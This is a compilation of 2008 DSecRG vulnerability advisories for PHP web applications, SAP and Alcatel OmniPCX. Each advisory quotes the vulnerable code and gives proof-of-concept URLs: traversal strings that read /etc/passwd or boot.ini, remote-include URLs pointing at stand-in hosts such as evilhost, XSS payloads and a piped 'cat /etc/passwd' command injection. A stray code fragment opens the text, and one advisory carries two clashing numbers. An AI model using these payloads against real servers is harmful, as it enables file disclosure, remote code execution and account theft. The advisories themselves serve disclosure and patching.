             (substr($linkref,0,7) == 'telnet:') ||
             (substr($linkref,0,5) == 'wais:') ) {
            return True;
        } else {
            return False;
        }
    } else
[DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-036

Application:              Freeway eCommerce
Versions Affected:        1.4.1.171
Vendor URL:               http://www.openfreeway.org/
Bugs:                     RFI, Multiple LFI, XSS
Exploits:                 YES
Reported:                 27.06.2008
Second report:            04.07.2008
Vendor response:          06.07.2008
Solution:                 YES
Date of Public Advisory:  18.08.2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

The Freeway eCommerce system has multiple security vulnerabilities:

1. Multiple Remote/Local File Include
2. Linked XSS vulnerability

Details
*******

1. Freeway eCommerce has Multiple Remote/Local File Include vulnerabilities.

1.1 Remote File Include vulnerability found in script admin/create_order_new.php. Vulnerable GET parameter: include_page.

Code
#
...
$command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';
...
if($command!="") {
    switch($command){
    ...
    case 'include_page':
        require($HTTP_GET_VARS['include_page']);
        break;
    ...
#

Example:

http://[server]/[installdir]/admin/create_order_new.php?command=include_page&include_page=http://evilhost/info.php

1.2 Local File Include vulnerability found in script includes/events_application_top.php

Successful exploitation requires that register_globals is enabled.

Code
#
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_EVENTS_MESSAGES_MAIL);
#

Example:

http://[server]/[installdir]/includes/events_application_top.php?language=../../../../../../../../../../../../../etc/passwd%00

1.3 Local File Include vulnerabilities found in scripts:

includes/languages/english/account.php
includes/languages/french/account.php

Successful exploitation requires that register_globals is enabled.

Code
#
require(DIR_WS_LANGUAGES . $language . "/events_account.php");
#

Example:

http://[server]/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00

1.4 Local File Include vulnerability found in script includes/languages/french/account_newsletters.php

Successful exploitation requires that register_globals is enabled.

Code
#
require(DIR_WS_LANGUAGES . $language . "/events_account_newsletters.php");
#

Example:

http://[server]/[installdir]/includes/languages/french/account_newsletters.php?language=../../../../../../../../../../../../../etc/passwd%00

1.5 Local File Include vulnerability found in script includes/modules/faqdesk/faqdesk_article_require.php

Successful exploitation requires that register_globals is enabled.

Code
#
//require('includes/application_top.php');
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_FAQDESK_REVIEWS_ARTICLE);
#

Example:

http://[server]/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00

1.6 Local File Include vulnerability found in script includes/modules/newsdesk/newsdesk_article_require.php

Successful exploitation requires that register_globals is enabled.

Code
#
//require('includes/application_top.php');
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_NEWSDESK_REVIEWS_ARTICLE);
#

Example:

http://[server]/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00

1.7 Local File Include vulnerability found in script templates/Freeway/boxes/card1.php

Successful exploitation requires that register_globals is enabled.

Code
#
require(DIR_WS_LANGUAGES . $language . '/cards1_box.php');
#

Example:

http://[server]/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00

1.8 Local File Include vulnerability found in script templates/Freeway/boxes/loginbox.php

Successful exploitation requires that register_globals is enabled.

Code
#
require(DIR_WS_LANGUAGES . $language . '/loginbox.php
[DSECRG-08-035] Local File Include Vulnerability in Gallery 1.5.7, 1.6-alpha3
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-035

Application:              Gallery
Versions Affected:        1.5.7, 1.6-alpha3
Vendor URL:               http://gallery.menalto.com/
Bug:                      Local File Include
Exploits:                 YES
Reported:                 14.07.2008
Vendor response:          15.07.2008
Solution:                 YES
Date of Public Advisory:  08.08.2008
Authors:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Gallery has a local file include vulnerability in script contrib/phpBB2/modules.php.

Successful exploitation requires that register_globals is enabled.

Code
####

switch ($_REQUEST['op']) {
    case 'modload':
        // Added with changes in Security for PhpBB2.
        define('IN_PHPBB', true);
        define (LOADED_AS_MODULE,1);
        $phpbb_root_path = "./";
        // connect to phpbb
        include_once($phpbb_root_path . 'extension.inc');
        include_once($phpbb_root_path . 'common.'.$phpEx);
        include_once($phpbb_root_path . 'includes/functions.'.$phpEx);

####

Example:

http://[server]/[installdir]/contrib/phpBB2/modules.php?op=modload&phpEx=../../../../../../../../../../../../../etc/passwd

Solution
********

Vendor fixed this flaw on 05.08.2008. Download Gallery 1.5.8 and 1.6-RC1 from the download page on SourceForge:

http://sourceforge.net/project/showfiles.php?group_id=7130&package_id=7239&abmode=1

More information about the release:

http://gallery.menalto.com/gallery_1.5.8_released
[DSECRG-08-034] Local File Include Vulnerability in Minishowcase v09b136
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-034

Application:              Minishowcase Image Gallery
Versions Affected:        v09b136
Vendor URL:               http://minishowcase.frwrd.net
Bug:                      Local File Include
Exploits:                 YES
Reported:                 14.07.2008
Second report:            22.07.2008
Vendor response:          NONE
Solution:                 NONE
Date of Public Advisory:  29.07.2008
Authors:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Minishowcase Image Gallery has a local file include vulnerability in script libraries/general.init.php.

Vulnerable GET parameter: lang.

Successful exploitation requires that register_globals is enabled.

Code
####

...
$_dir_file = dirname(dirname(__FILE__));
$_dir_path = dirname($_SERVER["DOCUMENT_ROOT"] . $_SERVER['PHP_SELF']);
if ($_dir_file != $_dir_path) {
    if (!isset($settings['minishowcase_url']) || ($settings['minishowcase_url'] == "")) {
        die ("<p style=\"margin:6px;padding:20px;text-align:left;font-size:18px;background:#f60;color:#FFF;\">ALERT: if you are including minishowcase with PHP into a website, please set the <code>\$minishowcase_url</code> variable in the <code>/config/settings.php</code> file</p>");
    }
}
...
if (isset($_GET["lang"])) $set_language = $_GET["lang"];
$langfile = ROOT.'languages/'.$set_language.'.php';
require_once($langfile);

####

Example:

http://[server]/[installdir]/libraries/general.init.php?settings[minishowcase_url]=DSecRG&lang=../../../../../../../../../../../../../etc/passwd%00

Solution
********

No response or any updates from vendor.
[DSECRG-08-032] Claroline 1.8.10 Multiple XSS Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-032

Application:              Claroline eLearning and eWorking platform
Versions Affected:        1.8.10
Vendor URL:               http://www.claroline.net/
Bug:                      Multiple Linked XSS
Exploits:                 YES
Reported:                 18.07.2008
Vendor Response:          22.07.2008
Solution:                 YES
Date of Public Advisory:  22.07.2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Claroline has multiple linked XSS vulnerabilities.

Details
*******

1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in the URL string.

1.1 Linked XSS vulnerabilities found in scripts:

claroline/announcements/messages.php
claroline/auth/lostPassword.php
claroline/auth/profile.php
claroline/calendar/myagenda.php
claroline/group/group.php
claroline/learnPath/learningPath.php
claroline/learnPath/learningPathList.php
claroline/learnPath/module.php
claroline/phpbb/index.php
claroline/tracking/courseLog.php
claroline/tracking/course_access_details.php
claroline/tracking/delete_course_stats.php
claroline/tracking/userLog.php
claroline/tracking/user_access_details.php
claroline/user/user.php
claroline/user/userInfo.php

Attacker can inject XSS in the URL string.

Example:

http://[server]/[installdir]/claroline/calendar/myagenda.php?;<script>alert('DSecRG XSS')</script>
http://[server]/[installdir]/claroline/user/user.php?;<script>alert('DSecRG XSS')</script>

1.2 Linked XSS vulnerability found in claroline/tracking/courseLog.php, GET parameter view.

Example:

http://[server]/[installdir]/claroline/tracking/courseLog.php?view=DSec; STYLE=xss:expression(alert('DSecRG XSS'))

1.3 Linked XSS vulnerability found in claroline/tracking/toolaccess_details.php, GET parameter toolId.

Example:

http://[server]/[installdir]/claroline/tracking/toolaccess_details.php?toolId=;<script>alert('DSecRG XSS')</script>

Solution
********

Vendor fixed this flaw on 22.07.2008. New version 1.8.11 can be downloaded here:

http://downloads.sourceforge.net/claroline/claroline1811.tar.gz
http://downloads.sourceforge.net/claroline/claroline1811.zip
[DSECRG-08-029] Local File Include in Dokeos E-Learning System 1.8.5
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-029

Application:              Dokeos E-Learning System
Versions Affected:        1.8.5
Vendor URL:               http://dokeos.com/
Bug:                      Local File Include
Exploits:                 YES
Reported:                 01.07.2008
Vendor response:          05.07.2008
Solution:                 YES
Date of Public Advisory:  17.07.2008
Authors:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Dokeos E-Learning System has a local file include vulnerability in script user_portal.php.

Vulnerable GET parameter: include.

A registered user can use this vulnerability.

Code
####

if (!empty ($_GET['include']) && !strstr($_GET['include'], '/') && strstr($_GET['include'], '.html')) {
    include ('./home/'.$_GET['include']);
    $pageIncluded = true;
} else ..

####

Example:

http://[server]/[installdir]/user_portal.php?include=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00.html

Fix Information
***************

You can fix it by following the official information at http://www.dokeos.com/wiki/index.php/Security or wait for a new release.

Fixing this issue can be done by replacing line 770 of /user_portal.php by:

if (!empty ($_GET['include']) && preg_match('/^[a-zA-Z0-9_-]*\.html$/',$_GET['include']))

Regards,
Digital Security Research Group [DSecRG]

DIGITAL SECURITY
tel/fax: +7(812)703-1547
tel: +7(812)430-9130
web: www.dsec.ru
[DSECRG-08-027] Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-027

Application:              1024 CMS
Versions Affected:        1.4.3, 1.4.4 RFC
Vendor URL:               http://www.1024cms.com/
Bug:                      Multiple Remote/Local File Include
Exploits:                 YES
Reported:                 18.06.2008
Second report:            27.06.2008
Vendor Response:          NONE
Solution:                 NONE
Date of Public Advisory:  04.07.2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

1024 CMS has a Remote File Include vulnerability and multiple Local File Include vulnerabilities.

1. Remote/Local File Include vulnerabilities found in scripts:

themes/blog/layouts/standard.php
themes/default/layouts/standard.php
themes/portfolio/layouts/standard.php
themes/snazzy/layouts/standard.php

Code
####

<?php include("./themes/".$theme_dir."/layouts/basic_header.php"); ?>
<div class="centerbigtable">
<?php
if(!isset($page_include)) {
    if($page_ck['custom'] == '0')
        include("./pages/".$page."/default/content.php");
    else
        include("./pages/custom/".$page."/default/content.php");
}
else
    include($page_include);
?>

####

Example:

http://[server]/[installdir]/themes/blog/layouts/standard.php?page_include=http://evil.ru/evil.php
http://[server]/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://[server]/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00

Multiple Local File Include vulnerabilities:

2. Local File Include vulnerability found in script admin/lang/fr/reports/default.php

Code
####

if(isset($_GET['t'])) {
    switch($_GET['t']) {
        case "forum":
            include("../admin/lang/".$lang."/reports/ops/forum.php");
            break;
        case "download":
            include("../admin/lang/".$lang."/reports/ops/download.php");
            break;
        case "news":
            include("../admin/lang/".$lang."/reports/ops/news.php");
            break;
    }
}
else die("You cannot access this page directly");

####

Example:

http://[server]/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00

3. Local File Include vulnerabilities found in scripts:

admin/ops/admins/default.php
admin/ops/reports/ops/download.php
admin/ops/reports/ops/forum.php
admin/ops/reports/ops/news.php

Code
####

<?php include("./themes/".$admin_theme_dir."/templates/default_header.tpl");
...

####

Example:

http://[server]/[installdir]/admin/ops/admins/default.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://[server]/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00

4. Local File Include vulnerabilities found in scripts:

lang/en/moderator/default.php
lang/fr/moderator/default.php

Code
####

if(isset($_GET['t'])) {
    switch($_GET['t']) {
        case "forum":
            include("./lang/".$lang."/moderator/ops/forum.php");
            break;
        case "download":
            include("./lang/".$lang."/moderator/ops/download.php");
            break;
        case "gallery":
            include("./lang/".$lang."/moderator/ops/gallery.php");
            break;
        case "news":
            include("./lang/".$lang."/moderator/ops/news.php");
            break;
    }
}

####

Example:

http://[server]/[installdir]/lang/en/moderator/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
http://[server]/[installdir]/lang/fr/moderator/default.php?t=download&lang=../../../../../../../../../../../../../boot.ini%00

5. Local File Include vulnerability found in script lang/de/moderator/default.php

Code
####

if(isset($_GET['t'])) {
    switch($_GET['t']) {
        case "forum":
            include("./lang/".$lang."/moderator/ops/forum.php");
            break;
        case "download":
            include("./lang/".$lang."/moderator/ops/download.php");
            break;
        case "news":
            include("./lang/".$lang."/moderator/ops/news.php");
            break
[DSECRG-08-024] Multiple Security Vulnerabilities (RFI,LFI,XSS) in QuateCMS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-024

Application:              Quate CMS
Versions Affected:        0.3.4
Vendor URL:               http://www.quate.net/
Bugs:                     RFI, Multiple LFI, Directory traversal, Multiple XSS
Exploits:                 YES
Reported:                 18.03.2008
Second report:            25.03.2008
Vendor response:          NONE
Solution:                 NONE
Date of Public Advisory:  23.05.2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Quate CMS has multiple security vulnerabilities:

1. Multiple Remote/Local File Include
2. Multiple Linked XSS vulnerabilities
3. Directory traversal

Details
*******

1. Quate CMS has multiple Local File Include vulnerabilities.

1.1 Local File Include vulnerability found in script admin/includes/footer.php

Code
####

if ($not_logged_in != 1) {
    if (file_exists("includes/themes/".$row_secure['account_theme']."/footer.php")) {
        require_once("themes/".$row_secure['account_theme']."/footer.php");
    } else {
        require_once("themes/".$admin_template_default."/footer.php");
    }
} else {
    require_once("themes/".$admin_template_default."/footer.php");
}

####

Example:

http://[server]/[installdir]/admin/includes/footer.php?admin_template_default=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/admin/includes/footer.php?not_logged_in=1&admin_template_default=../../../../../../../../../../../../../etc/passwd%00

1.2 Remote and Local File Include vulnerability found in script admin/includes/header.php

Code
####

if ($bypass_installed != 1) {
    if (!is_file("../includes/installed")) {
        ...
        require("../includes/simple_gui.php");
        exit();
    }
}
if ($bypass_restrict != 1) {
    require_once($secure_page_path."includes/secure.php");
}
$admin_template_default = "default";
if ($not_logged_in != 1) {
    //echo $row_secure['account_theme'];
    if (file_exists("includes/themes/".$row_secure['account_theme']."/header.php")) {
        require_once("themes/".$row_secure['account_theme']."/header.php");
    } else {
        require_once("themes/".$admin_template_default."/header.php");
    }
} else {
    require_once("themes/".$admin_template_default."/header.php");
}

####

Example:

http://[server]/[installdir]/admin/includes/header.php?bypass_installed=1&secure_page_path=http://evilhost/info.php%00
http://[server]/[installdir]/admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00

2. Linked XSS in Path vulnerability found in the following pages:

/admin/index.php
/admin/login.php
/admin/credits.php
/upgrade/index.php

Example:

http://[server]/[installdir]/admin/login.php/;<script>alert("DSecRG XSS")</script>
http://[server]/[installdir]/upgrade/index.php/;<IMG SRC=javascript:alert('DSecRG XSS')>

3. File Manager directory traversal

Administrator can access system files outside the htdocs directory using a directory traversal vulnerability.

http://[server]/[installdir]/admin/filemanager.php?type=edit&dir=/../../../../../../../../..&file=boot.ini
[DSECRG-08-025] Local File Include in OneCMS 2.5
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-025

Application:              OneCMS
Versions Affected:        2.5
Vendor URL:               http://www.insanevisions.com/
Bug:                      Local File Include
Exploits:                 YES
Reported:                 26.03.2008
Vendor Response:          NONE
Solution:                 NONE
Date of Public Advisory:  23.05.2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Local File Include vulnerability found in script install_mod.php

Code
####

$mod = $_GET['load'];
$filexp = explode(".", $mod);
$filetype = $filexp[1];
$file = $filexp[0];
$file2 = "mods/$mod";
if (!is_numeric($mod)) { // makes sure that the user isnt entering a #
    if ($filetype == "php") {
        if ($_GET['act'] == "") {
            echo "Are you sure you would like to install the <b>".$file."</b> module?<br><a href='install_mod.php?load=".$mod."&act=go'>Yes</a>";
        }
        if ($_GET['act'] == "go") {
            include ($file2);
...

####

Example:

http://[server]/[installdir]/install_mod.php?act=go&load=1234.php../../../../../../../../../../../../../etc/passwd
[DSECRG-08-023] SAP Web Application Server XSS Security Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-023

Application:              SAP Web Application Server
Versions Affected:        Version 7.0
Vendor URL:               http://SAP.com
Bugs:                     XSS
Exploits:                 YES
Reported:                 25.01.2008
Vendor response:          25.01.2008
Date of Public Advisory:  21.05.2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

SAP Web Application Server has a Linked XSS security vulnerability.

Details
*******

Linked XSS vulnerability found in URL /sap/bc/gui/sap/its/webgui/. Attacker can inject XSS in the URL string. Web Dynpro ABAP and BSP are also vulnerable.

Example:

http://[server]:8000/sap/bc/gui/sap/its/webgui/aaa;<img/src=javascript:alert('DSECRG_XSS')>

Fix Information
***************

The issue has been solved in the ICF system login and as such it is not only relevant for the Web GUI, but also for Web Dynpro ABAP and for BSP.

Customers can download patches following the solution documented in SAP note 1136770.
[DSECRG-08-020] Alcatel OmniPCX Office Remote Command Execution
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-020

Application:              Alcatel OmniPCX Office
Versions Affected:        Alcatel OmniPCX Office since release 210/061.1
Vendor URL:               http://alcatel.com
Bugs:                     Remote command execution
Exploits:                 YES
Risk:                     High
CVSS Score:               7.31
CVE-number:               2008-1331
Reported:                 31.01.2008
Vendor response:          01.02.2008
Customers informed:       07.03.2008
Published on PSIRT:       01.04.2008
Date of Public Advisory:  21.05.2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Introduction
************

The OmniPCX Enterprise is an integrated communications solution for medium-sized businesses and large corporations. It combines the best of the old (legacy TDM phone connectivity) with the new (a native IP platform and support for Session Initiation Protocol, or SIP) to provide an effective and complete communications solution for cost-conscious companies on the cutting edge. (from the vendor's homepage)

Description
***********

Alcatel OmniPCX Office Web Interface has a critical security vulnerability: remote command execution.

The risk of this vulnerability is high. Any user who has access to the web interface of the OmniPCX Enterprise solution will be able to execute arbitrary commands on the server with the permissions of the web server.

Details
*******

Remote command execution vulnerability found in script /cgi-data/FastJSData.cgi, parameter id2.

The id2 variable is not filtered when passed to the shell. Thus, arbitrary commands can be executed on the server by adding them to the user variable, separated by semicolons.

You can find more details on this advisory on the vendor's website http://www1.alcatel-lucent.com/psirt/statements.htm under reference 2008001.

Example:

http://[server]/cgi-data/FastJSData.cgi?id1=sh2kerr&id2=91|cat%20/etc/passwd

Fix Information
***************

Alcatel was altered to fix this flaw on 01.04.2008. Updated version can be downloaded here:

http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html
[DSECRG-08-022] Multiple Security Vulnerabilities in Bolinos 4.6.1
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-022

Application:              BolinOS
Versions Affected:        4.6.1
Vendor URL:               http://www.bolinos.com
Bugs:                     Local File Include, Multiple XSS, System information disclosure
Exploits:                 YES
Reported:                 13.03.2008
Second report:            18.03.2008
Vendor response:          none
Solution:                 none
Date of Public Advisory:  25.03.2008
Authors:                  Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

BolinOS has multiple security vulnerabilities:

1. Local File Include
2. Multiple Linked XSS vulnerabilities
3. Multiple XSS in POST
4. System information disclosure

Details
*******

1. Local File Include vulnerability found in system/_b/contentFiles/gbincluder.php

Code
####

$actionpagetoinclude=$_GET["_bFileToInclude"];
if($actionpagetoinclude!="" && @file_exists(gBRootPath."/$actionpagetoinclude")){
    @include(gBRootPath."/$actionpagetoinclude");
}
else{
    echo "NO FILE";
}

####

Example:

http://[server]/[installdir]/system/_b/contentFiles/gbincluder.php?_bFileToInclude=../../../../../../../../../../../../../etc/passwd

2. Multiple linked XSS vulnerabilities found.

2.1 Linked XSS vulnerability found in page /system/actionspages/_b/contentFiles/gBImageViewer.php

Attacker can inject XSS in GET parameter url.

Example:

http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBImageViewer.php?url=<script>alert('DSecRG XSS')</script>

2.2 Linked XSS vulnerability found in page /system/actionspages/_b/contentFiles/gBselectorContents.php

Attacker can inject XSS in GET parameter ForEditor.

Example:

http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBselectorContents.php?ForEditor='<IMG%20SRC=javascript:alert('DSecRG XSS')>

2.3 Linked XSS vulnerabilities found in the following pages:

/system/actionspages/_b/contentFiles/gBLoginPage.php
/system/actionspages/_b/contentFiles/gBPassword.php

Attacker can inject XSS script in the URL.

Example:

http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBLoginPage.php/;<script>alert('DSecRG XSS')</script>
http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBPassword.php/;<script>alert('DSecRG XSS')</script>

3. Multiple XSS in POST vulnerabilities; attacker can inject XSS in a POST parameter.

3.1 Vulnerability found in script /system/actionspages/_b/contentFiles/gBLoginPage.php, POST parameter formlogin.

Example:

POST /bolinos/system/actionspages/_b/contentFiles/gBLoginPage.php?bAddress=bolinos.sessions HTTP/1.0
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET CLR 2.0.50727)

formlogin=%27img%20src%3d%22javascript:alert(%27DSecRG%20XSS%27)%22&BtLogin.x=

3.2 Vulnerability found in page /help/index.php, POST parameter bolini_searchengine46Search.

Example:

bolini_searchengine46Search = '<IMG SRC=javascript:alert(&quot;DSecRG&#x20;XSS&quot;)>

4. System information disclosure

An unauthenticated user can access the phpinfo() page:

http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBphpInfo.php
[DSECRG-08-019] LFI in PowerBook 1.21
Hello, bugtraq.

[DSECRG-08-031] Digital Security Research Group [DSecRG] Advisory

Application:              PowerBook
Versions Affected:        1.21
Vendor URL:               http://www.powerscripts.org/
Bug:                      Local File Include
Exploits:                 YES
Reported:                 01.02.2008
Vendor Response:          none
Solution:                 none
Date of Public Advisory:  ..2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Local File Include vulnerability found in script pb_inc/admincenter/index.php

An unauthenticated user can directly access this script. To exploit this vulnerability the REGISTER_GLOBALS option must be ON in the PHP config file.

Code
####

if (!$page) {
    $page = "home";
}
$page .= ".inc.php";
if(file_exists($page) == false) {
    echo "<div align=\"center\">Sorry, the page <b>$page</b> does not exist!</div>";
} else {
    include($page);
}

####

Example:

http://[server]/[installdir]/pb_inc/admincenter/index.php?page=../../../../../../../../../../../../../etc/passwd%00

--
Alexandr Polyakov
DIGITAL SECURITY RESEARCH GROUP
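The include guards quoted in the Dokeos 1.8.5 advisory (strstr checks, bypassed with backslashes and a NUL byte) and the PowerBook pattern above (user-controlled name with ".inc.php" appended, no check at all) share one fix: validate the bare name against an anchored allow-list before it touches a path. The following is an added example, not code from DSecRG, Dokeos or PowerBook; dokeosOriginalGuard() and dokeosFixedGuard() transcribe the two lines the Dokeos advisory quotes, while resolveInclude() and the temporary directory it uses are assumptions that generalise the fix to the PowerBook shape.

```php
<?php
declare(strict_types=1);
// Added example: the include guard quoted in the Dokeos 1.8.5 advisory next
// to the allow-list fix the advisory recommends, run on the advisory's own
// payload, plus an assumed helper that applies the same allow-list to the
// PowerBook-style "$page .= '.inc.php'" pattern.

// Guard as quoted from Dokeos 1.8.5 user_portal.php: no forward slash and
// ".html" somewhere in the string.  Backslashes (a path separator on
// Windows) and NUL bytes are not rejected, so "..\..\boot.ini\0.html" passes.
function dokeosOriginalGuard(string $include): bool
{
    return !empty($include)
        && !strstr($include, '/')
        && strstr($include, '.html') !== false;
}

// The replacement the advisory suggests for line 770: an anchored regex, so
// only "<name>.html" built from a safe character set can pass.
function dokeosFixedGuard(string $include): bool
{
    return !empty($include)
        && preg_match('/^[a-zA-Z0-9_-]*\.html$/', $include) === 1;
}

// Assumed generalisation for the PowerBook shape: validate the bare name
// BEFORE any concatenation or filesystem call (PHP 8 throws on NUL bytes
// in paths, so the regex must run first), then confirm the resolved file
// still lives under $baseDir.  Returns the path to include, or null.
function resolveInclude(string $baseDir, string $name, string $suffix): ?string
{
    if (preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name) !== 1) {
        return null;                        // traversal, NUL, separators, empty
    }
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $name . $suffix);
    if ($base === false || $target === false) {
        return null;                        // directory or file does not exist
    }
    // realpath() has already collapsed ".." and symlinks; the prefix check
    // is the containment test.
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Constructed inputs: a legitimate page, the Dokeos payload from the
// advisory with %00 decoded, and a PowerBook-style traversal.
function runChecks(): array
{
    $out = [];
    foreach (['legit' => 'welcome.html', 'dokeos_payload' => "..\\..\\..\\boot.ini\0.html"] as $label => $value) {
        $out[$label] = [
            'original_guard' => dokeosOriginalGuard($value),
            'fixed_guard'    => dokeosFixedGuard($value),
        ];
    }

    // Temporary include root (assumed layout) for the resolveInclude() demo.
    $root = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
    mkdir($root . '/pb_inc', 0700, true);
    file_put_contents($root . '/pb_inc/home.inc.php', "<?php // demo page\n");

    $out['powerbook_legit']     = resolveInclude($root . '/pb_inc', 'home', '.inc.php') !== null;
    $out['powerbook_traversal'] = resolveInclude($root . '/pb_inc', "../../../../etc/passwd\0", '.inc.php') !== null;

    unlink($root . '/pb_inc/home.inc.php');
    rmdir($root . '/pb_inc');
    rmdir($root);
    return $out;
}

foreach (runChecks() as $label => $result) {
    echo str_pad($label, 20), json_encode($result), PHP_EOL;
}
```

Run with `php lfi_demo.php`: the original guard accepts both the legitimate page and the traversal payload, the fixed guard accepts only the legitimate page, and resolveInclude() returns a path only for the real home.inc.php.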
[DSECRG-08-017] Flyspray 0.9.9.4 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-017

Application:              Flyspray (web-based bug tracking system)
Versions Affected:        0.9.9.4
Vendor URL:               http://www.flyspray.org
Bugs:                     SiXSS, Stored XSS, Brute Force
Exploits:                 YES
Reported:                 08.02.2008
Vendor response:          08.02.2008
Solution:                 24.02.2008
Date of Public Advisory:  03.03.2008
Author:                   Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Flyspray has multiple security vulnerabilities:

1. SiXSS in POST
2. Stored XSS in POST
3. Login Error Messages Credential Enumeration

Details
*******

1. SiXSS in POST: attacker can inject XSS code into the SQL error.

1.1 Vulnerabilities found in script index.php?do=myprofile. POST parameters tasks_perpage, time_zone, account_enabled, notify_own.

Example:

tasks_perpage = <script>alert('DSecRG XSS')</script>
time_zone = <img src=javascript:alert('DSecRG XSS')>

1.2 Vulnerabilities found in script index.php?do=admin&area=newproject. POST parameters anon_open, others_view.

Example:

anon_open = <img src=javascript:alert('DSecRG XSS')>

1.3 Vulnerabilities found in script index.php?do=admin&area=cat. POST parameters lft[4], rgt[4].

Example:

rgt[4] = <script>alert('DSecRG XSS')</script>

1.4 Vulnerabilities found in script index.php?do=pm&area=prefs. POST parameters comment_closed, project_is_active.

Example:

project_is_active = <img src=javascript:alert('DSecRG XSS')>

1.5 Vulnerabilities found in script index.php?do=details. POST parameters closedby_version, edit, edit_start_time, find_user, item_status, operating_system, percent_complete, product_category, project_id, reportedver, task_priority, task_severity, task_type.

Example:

project_id = <script>alert('DSecRG XSS')</script>
item_status = <img src=javascript:alert('DSecRG XSS')>

2. Stored XSS vulnerability found in script index.php?do=details on the task details page. POST parameter item_summary.

Example:

item_summary = <script>alert('DSecRG XSS')</script>

3. Login Error Messages Credential Enumeration

When trying to log in using bad credentials, the application generates different error messages when the user inputs an invalid username and an invalid password separately. Attacker can use the brute force technique to establish valid usernames, before proceeding to attempt discovery of the associated password.

Fix Information
***************

Flyspray was altered to fix this flaw on 24.02.2008. Updated version (0.9.9.5) can be downloaded here:

http://www.flyspray.org/download/

Vendor advisory
***************

http://flyspray.org/fsa:3

--
Digital Security Research Group
[DSECRG-08-016] Jinzora 2.7.5 Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-016

Application:              Jinzora Media Jukebox
Versions Affected:        2.7.5
Vendor URL:               http://www.jinzora.com/
Bugs:                     Multiple XSS Injections
Exploits:                 YES
Reported:                 04.02.2008
Second report:            12.02.2008
Vendor response:          NONE
Date of Public Advisory:  19.02.2008
Authors:                  Alexandr Polyakov, Stas Svistunovich
                          Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Jinzora has multiple security vulnerabilities:

1. Linked XSS
2. Stored XSS

Details
*******

1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in the URL string.

1.1 Linked XSS vulnerabilities found in index.php. GET parameters frontend, set_frontend, jz_path, theme, set_theme.

Example:

http://[server]/[installdir]/index.php?frontend=<IMG SRC=javascript:alert('DSecRG XSS')>

1.2 Linked XSS vulnerabilities found in ajax_request.php. GET parameters frontend, theme, language.

Example:

http://[server]/[installdir]/ajax_request.php?language=<IMG SRC=javascript:alert('DSecRG XSS')>

